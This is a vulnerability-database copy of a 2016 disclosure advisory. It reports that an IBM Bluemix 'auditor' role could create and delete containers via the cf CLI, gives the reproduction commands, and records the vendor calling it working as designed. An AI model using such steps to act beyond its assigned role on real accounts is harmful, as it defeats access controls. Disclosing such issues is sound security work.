Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bluemix Container Authorization Controls

🗓️ 09 Dec 2016 00:00:00Reported by Oscar MartinezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Bluemix Container Authorization Controls - User with "auditor" role can create and delete containers using cli C

Code
`# Date : 09/12/2016  
# Author : Oscar Martinez  
# Tested on:cf version 6.22.1+6b7af9c-2016-09-24 / Docker version 1.12.3,  
build 6b644ec / API endpoint: https://api.ng.bluemix.net (API version:  
2.54.0)  
API endpoint: https://api.ng.bluemix.net (API version: 2.54.0)  
# Vendor : IBM  
# Software : bluemix https://www.ibm.com/cloud-computing/bluemix/  
  
# Vulnerability Description:  
It is assumed that a user with auditor role should not be able to create or  
delete containers.  
reference:  
https://console.ng.bluemix.net/docs/admin/users_roles.html  
But, a user with auditor role CAN create or delete containers using the cli  
CF.  
  
1. Connect to bluemix using the cli CF with the user with "auditor" role.  
1.1 cf login [-sso]  
1.2 cf ic init  
2. Show the images  
2.1 cf ic images  
3. Create the container  
3.1 cf ic run --name broken_access_666 -p 8080 -m 512  
registry.ng.bluemix.net/[your site]/[your image]  
example:  
cf ic run --name broken_access_666 -p 8080 -m 512  
registry.ng.bluemix.net/mysite/tomcat  
4. Delete your container  
cf ic stop [your container]  
cf ic rm [your container]  
example:  
cf ic stop broken_access_666  
cf ic rm broken_access_666  
  
Time Line  
---------  
* 2016/11/28: First contact with vendor (  
https://www.ibm.com/scripts/contact/contact/us/en/security_vulnerabilities/)  
* 2016/11/28: IBM PSIRT assigned PSIRT Advisory <7263>  
* 2016/12/08: IBM PSIRT answered by email "issue is working as designed "  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Dec 2016 00:00Current
0.3Low risk
Vulners AI Score0.3
bluemixcontainerauthorizationcontrolsauditor roleibmvulnerabilitycfcliuserimagescreatedeletepsirtadvisory
25